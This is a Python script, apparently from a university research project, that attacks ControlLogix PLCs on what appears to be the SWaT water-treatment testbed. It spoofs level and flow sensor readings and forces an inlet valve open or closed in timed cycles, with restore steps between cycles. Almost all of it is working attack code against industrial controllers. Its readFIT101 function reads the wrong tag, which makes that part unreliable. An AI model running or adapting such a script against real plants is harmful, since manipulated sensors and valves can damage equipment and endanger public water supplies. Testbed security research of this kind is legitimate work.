"""
Herman Wijaya
Student ID: 1003975
SUTD - MSSD (2018)

ecp-fuzzer.py

Use pycomm python2 module to communicate with ControlLogix PLCs

adapted from: examples/test_ab_comm.py
more on: https://github.com/ruscito/pycomm
"""

import random
import time
from datetime import datetime
from pycomm.ab_comm.clx import Driver as ClxDriver


PLC_IP = {
    'plc1': '192.168.1.10',
    'plc2': '192.168.1.20',
    'plc3': '192.168.1.30',
    'plc4': '192.168.1.40',
    'plc5': '192.168.1.50',
    'plc6': '192.168.1.60',
    'plc1r': '192.168.1.11',
    'plc2r': '192.168.1.21',
    'plc3r': '192.168.1.31',
    'plc4r': '192.168.1.41',
    'plc5r': '192.168.1.51',
    'plc6r': '192.168.1.61',
}

def plcWrite(plc_ip, tag_name, value, tag_type):
    '''
    Write to a plc tag and print a status code.
    '''
    plc = ClxDriver()
    if plc.open(plc_ip):
        print(plc.write_tag(tag_name, value, tag_type))
        plc.close()
    else:
        print("Unable to open", plc_ip)

def plcRead(plc_ip, tag_name):
    '''
    Read a plc tag and print the rx data
    '''
    plc = ClxDriver()
    if plc.open(plc_ip):
        tag_val = plc.read_tag(tag_name)
        plc.close()
        return (tag_val)
    else:
        print("Unable to open", plc_ip)

def consoleLog(message, log_type="info"):
    print("[{}] ".format(datetime.now().strftime("%d/%m/%Y %I:%M:%S %p")) + message)
    plc = ClxDriver()
    if log_type == "warn":
        plc.logger.warn(message)
    else:
        plc.logger.info(message)

def readLIT101():
    LIT101 = plcRead(PLC_IP['plc1'], 'HMI_LIT101.Pv')
    return LIT101[0]

def readFIT101():
    LIT101 = plcRead(PLC_IP['plc1'], 'HMI_LIT101.Pv')
    return LIT101[0]

def readMV101():
    MV101 = plcRead(PLC_IP['plc1'], 'HMI_MV101.Status')
    return MV101[0]

def attackLIT101(attack_val):
    plcWrite(PLC_IP['plc1'], 'HMI_LIT101.Sim', True, 'BOOL')
    plcWrite(PLC_IP['plc1'], 'HMI_LIT101.Sim_PV', attack_val, 'REAL')

def attackMV101(attack_state):
    plcWrite(PLC_IP['plc1'], 'HMI_MV101.Auto', False, 'BOOL')
    if (attack_state == "open"):
        plcWrite(PLC_IP['plc1'], 'HMI_MV101.Cmd', 2, 'INT')
    elif (attack_state == "closed"):
        plcWrite(PLC_IP['plc1'], 'HMI_MV101.Cmd', 1, 'INT')

def attackFIT101(attack_val):
    plcWrite(PLC_IP['plc1'], 'HMI_FIT101.Sim', True, 'BOOL')
    plcWrite(PLC_IP['plc1'], 'HMI_FIT101.Sim_PV', attack_val, 'REAL')

def restorePlant(rest_dur):
    plcWrite(PLC_IP['plc1'], 'HMI_LIT101.Sim', False, 'BOOL')
    plcWrite(PLC_IP['plc1'], 'HMI_MV101.Auto', True, 'BOOL')
    plcWrite(PLC_IP['plc1'], 'HMI_FIT101.Sim', False, 'BOOL')
    consoleLog("Returning plant to normal state for {} min".format(rest_dur / 60))
    time.sleep(rest_dur)

def main():
    plant_runtime = 3600.0 * 3      # 3 hours
    attack_dur = 30                 # 30 seconds
    rest_dur = 60.0 * 1             # 1 min

    consoleLog("Starting SWaT Domain-bazed Fuzzer with {} min rest interval".format(rest_dur/60))

    lit_parts = ["underflow", "high", "low", "normal"]
    mv_parts = ["closed", "open"]
    fit_parts = ["zero", "flowing", "abnormal"]

    for n in range(int(plant_runtime/(attack_dur+rest_dur))):

        for i in range(len(lit_parts)):

            if lit_parts[i] == "underflow":
                for j in range(len(mv_parts)):
                    mv101_attackState = mv_parts[j]

                    for k in range(len(fit_parts)):
                        lit101_attackVal = random.uniform(0.0, 250.0)

                        if mv101_attackState == "closed":
                            if fit_parts[k] == "zero":
                                attackLIT101(lit101_attackVal)
                                attackMV101(mv101_attackState)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}) and MV101 to '{}'".format(
                                        lit_parts[i], lit101_attackVal,
                                        mv101_attackState),
                                    "warn")
                            elif fit_parts[k] == "flowing":
                                fit101_attackVal = random.uniform(0.01, 4.39)
                                attackLIT101(lit101_attackVal)
                                attackMV101(mv101_attackState)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}), MV101 to '{}' and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        mv101_attackState,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")
                            elif fit_parts[k] == "abnormal":
                                case = random.randrange(2)
                                if case % 2 == 0:
                                    fit101_attackVal = random.uniform(-0.01, -1.0)
                                else:
                                    fit101_attackVal = random.uniform(4.40, 6.0)
                                attackLIT101(lit101_attackVal)
                                attackMV101(mv101_attackState)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}), MV101 to '{}' and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        mv101_attackState,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                        elif mv101_attackState == "open":
                            if fit_parts[k] == "zero":
                                fit101_attackVal = 0.0
                                attackLIT101(lit101_attackVal)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}) and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")
                            elif fit_parts[k] == "flowing":
                                attackLIT101(lit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal),
                                    "warn")
                            elif fit_parts[k] == "abnormal":
                                case = random.randrange(2)
                                if case % 2 == 0:
                                    fit101_attackVal = random.uniform(-0.01, -1.0)
                                else:
                                    fit101_attackVal = random.uniform(4.40, 6.0)
                                attackLIT101(lit101_attackVal)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}) and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                        time.sleep(attack_dur)
                        restorePlant(rest_dur)

            elif lit_parts[i] == "low":
                for j in range(len(mv_parts)):
                    mv101_attackState = mv_parts[j]
                    for k in range(len(fit_parts)):
                        lit101_attackVal = random.uniform(250.01, 500.0)

                        if mv101_attackState == "closed":
                            if fit_parts[k] == "zero":
                                attackLIT101(lit101_attackVal)
                                attackMV101(mv101_attackState)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}) and MV101 to '{}'".format(
                                        lit_parts[i], lit101_attackVal,
                                        mv101_attackState),
                                    "warn")

                            elif fit_parts[k] == "flowing":
                                fit101_attackVal = random.uniform(0.01, 4.39)
                                attackLIT101(lit101_attackVal)
                                attackMV101(mv101_attackState)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}), MV101 to '{}' and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        mv101_attackState,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                            elif fit_parts[k] == "abnormal":
                                case = random.randrange(2)
                                if case % 2 == 0:
                                    fit101_attackVal = random.uniform(-0.01, -1.0)
                                else:
                                    fit101_attackVal = random.uniform(4.40, 6.0)
                                attackLIT101(lit101_attackVal)
                                attackMV101(mv101_attackState)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}), MV101 to '{}' and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        mv101_attackState,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                        elif mv101_attackState == "open":
                            if fit_parts[k] == "zero":
                                fit101_attackVal = 0.0
                                attackLIT101(lit101_attackVal)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}) and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                            elif fit_parts[k] == "flowing":
                                attackLIT101(lit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal),
                                    "warn")

                            elif fit_parts[k] == "abnormal":
                                case = random.randrange(2)
                                if case % 2 == 0:
                                    fit101_attackVal = random.uniform(-0.01, -1.0)
                                else:
                                    fit101_attackVal = random.uniform(4.40, 6.0)
                                attackLIT101(lit101_attackVal)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}) and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                        time.sleep(attack_dur)
                        restorePlant(rest_dur)

            if lit_parts[i] == "normal":
                for j in range(len(mv_parts)):
                    mv101_attackState = mv_parts[j]

                    for k in range(len(fit_parts)):
                        if mv101_attackState == "closed":
                            if fit_parts[k] == "flowing":
                                fit101_attackVal = random.uniform(0.01, 4.39)
                                attackMV101(mv101_attackState)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking MV101 to '{}' and FIT101 to '{}' ({})".format(
                                        mv101_attackState,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                            elif fit_parts[k] == "abnormal":
                                case = random.randrange(2)
                                if case % 2 == 0:
                                    fit101_attackVal = random.uniform(-0.01, -1.0)
                                else:
                                    fit101_attackVal = random.uniform(4.40, 6.0)
                                attackMV101(mv101_attackState)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking MV101 to '{}' and FIT101 to '{}' ({})".format(
                                        mv101_attackState,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                        elif mv101_attackState == "open":
                            if fit_parts[k] == "zero":
                                fit101_attackVal = 0.0
                                attackMV101(mv101_attackState)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking MV101 to '{}' and FIT101 to '{}' ({})".format(
                                        mv101_attackState,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                            elif fit_parts[k] == "abnormal":
                                case = random.randrange(2)
                                if case % 2 == 0:
                                    fit101_attackVal = random.uniform(-0.01, -1.0)
                                else:
                                    fit101_attackVal = random.uniform(4.40, 6.0)
                                attackMV101(mv101_attackState)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking MV101 to '{}' and FIT101 to '{}' ({})".format(
                                        mv101_attackState,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                        time.sleep(attack_dur)
                        restorePlant(rest_dur)

            if lit_parts[i] == "high":
                for j in range(len(mv_parts)):
                    mv101_attackState = mv_parts[j]
                    for k in range(len(fit_parts)):
                        lit101_attackVal = random.uniform(800.0, 1000.0)

                        if mv101_attackState == "closed":
                            if fit_parts[k] == "zero":
                                attackLIT101(lit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal),
                                    "warn")

                            elif fit_parts[k] == "flowing":
                                fit101_attackVal = random.uniform(0.01, 4.39)
                                attackLIT101(lit101_attackVal)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}) and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                            elif fit_parts[k] == "abnormal":
                                case = random.randrange(2)
                                if case % 2 == 0:
                                    fit101_attackVal = random.uniform(-0.01, -1.0)
                                else:
                                    fit101_attackVal = random.uniform(4.40, 6.0)
                                attackLIT101(lit101_attackVal)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}) and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                        elif mv101_attackState == "open":
                            if fit_parts[k] == "zero":
                                fit101_attackVal = 0.0
                                attackLIT101(lit101_attackVal)
                                attackMV101(mv101_attackState)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}), MV101 to '{}' and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        mv101_attackState,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                            elif fit_parts[k] == "flowing":
                                attackLIT101(lit101_attackVal)
                                attackMV101(mv101_attackState)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}), MV101 to '{}'".format(
                                        lit_parts[i], lit101_attackVal,
                                        mv101_attackState),
                                    "warn")

                            elif fit_parts[k] == "abnormal":
                                case = random.randrange(2)
                                if case % 2 == 0:
                                    fit101_attackVal = random.uniform(-0.01, -1.0)
                                else:
                                    fit101_attackVal = random.uniform(4.40, 6.0)
                                attackLIT101(lit101_attackVal)
                                attackMV101(mv101_attackState)
                                attackFIT101(fit101_attackVal)
                                consoleLog(
                                    "Attacking LIT101 to '{}' ({}), MV101 to '{}' and FIT101 to '{}' ({})".format(
                                        lit_parts[i], lit101_attackVal,
                                        mv101_attackState,
                                        fit_parts[k], fit101_attackVal),
                                    "warn")

                        time.sleep(attack_dur)
                        restorePlant(rest_dur)

main()